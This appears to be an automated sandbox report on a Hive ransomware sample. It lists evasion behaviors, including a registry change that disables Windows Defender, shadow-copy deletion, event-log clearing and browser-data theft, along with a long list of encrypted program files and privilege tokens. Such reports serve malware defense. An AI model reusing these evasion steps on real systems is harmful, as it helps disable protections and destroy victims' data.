Malware Analysis Report

2024-10-16 03:10

Sample ID 220113-ljd6dahaf9
Target 2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709
SHA256 2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709
Tags
evasion ransomware spyware stealer trojan hive
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709

Threat Level: Known bad

The file 2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709 was found to be: Known bad.

Malicious Activity Summary

evasion ransomware spyware stealer trojan hive

Modifies security service

Hive

Modifies Windows Defender Real-time Protection settings

Deletes Windows Defender Definitions

Deletes shadow copies

Clears Windows event logs

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Runs ping.exe

Runs net.exe

Modifies registry class

Opens file in notepad (likely ransom note)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-13 09:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-13 09:33

Reported

2022-01-13 09:38

Platform

win7-en-20211208

Max time kernel

77s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baku._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_8jlZzZpFpxY0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_OffMask.bmp._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_P-3Q6X2qJS80.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_TtFRCIXprB80.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ca.txt._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_iyFJjLETHzk0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\MSInfo\fr-FR\msinfo32.exe.mui C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\correct.avi C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_I0Ce2wDXVCg0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_settings.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_ynfWb_GG4Gs0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21448_.GIF._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_Dm2rl5RgeO80.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\GrooveFormsMetaData.xml._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_bKl48FUmyoM0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\PICTIM32.FLT._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_4og7K6IFXOU0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14583_.GIF._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_TynFAHTqCso0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote-PipelineConfig.xml._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_reMugDB81PM0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_orange.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\OUTEX2.ECF._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_cWhPohHLHJw0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_0qYfMzMss8s0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_XLwWuDhDpT00.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_qu1N3n9tLqk0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATERMAR\PREVIEW.GIF._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_4fi4qt84JKs0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200163.WMF._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_T4lj1vwUooM0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02233_.WMF._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_HFqhn7QbeUc0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.NO.XML._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_xgN4j_L_3I40.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\micaut.dll.mui C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00485_.WMF._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_U67ZOhe1ohU0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\css\cpu.css C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\fr-FR\css\settings.css C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous_partly-cloudy.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_F9c14Q_hoTg0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\settings.css C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\GIFIMP32.FLT._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_gNGHVDoABxk0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotslightoverlay.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_CqebK3qvkHE0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Classic.dotx._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_px3pHj5GM640.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN103.XML._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_nKwRWcJXi1Q0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\settings.html C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_AoOA82nfyho0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_346Nw1XbkBo0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_sml.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00438_.WMF._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_7rqjEhx5aCQ0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Sts.css._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_yw0nDOYJ_tY0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsHomePage.html._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_i9xhqVGfqVo0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\circle_glass_Thumbnail.bmp C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_gJZa1qNpDE00.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31F.GIF._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_kjOov0Nqmw00.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate\TAB_OFF.GIF._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_N1-OqzW2eFs0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_b5AnUyzQbXI0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_cTy7uNOvJ2c0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\js\cpu.js C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\ReviewRouting_Init.xsn._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_v2rkJ0LGU0o0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\MLA.XSL._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_sNllsQ7fhHw0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_-YHfVhMvj2M0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Minesweeper\en-US\Minesweeper.exe.mui._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_qt6l255MMHs0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\25.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\notConnectedStateIcon.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.htm C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip._XHa6LS-aG1clKB9cHFzCpoLsDXKgg13qFwIC0mnq3z_zo7C1qQbQ5w0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\js\picturePuzzle.js C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1684 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
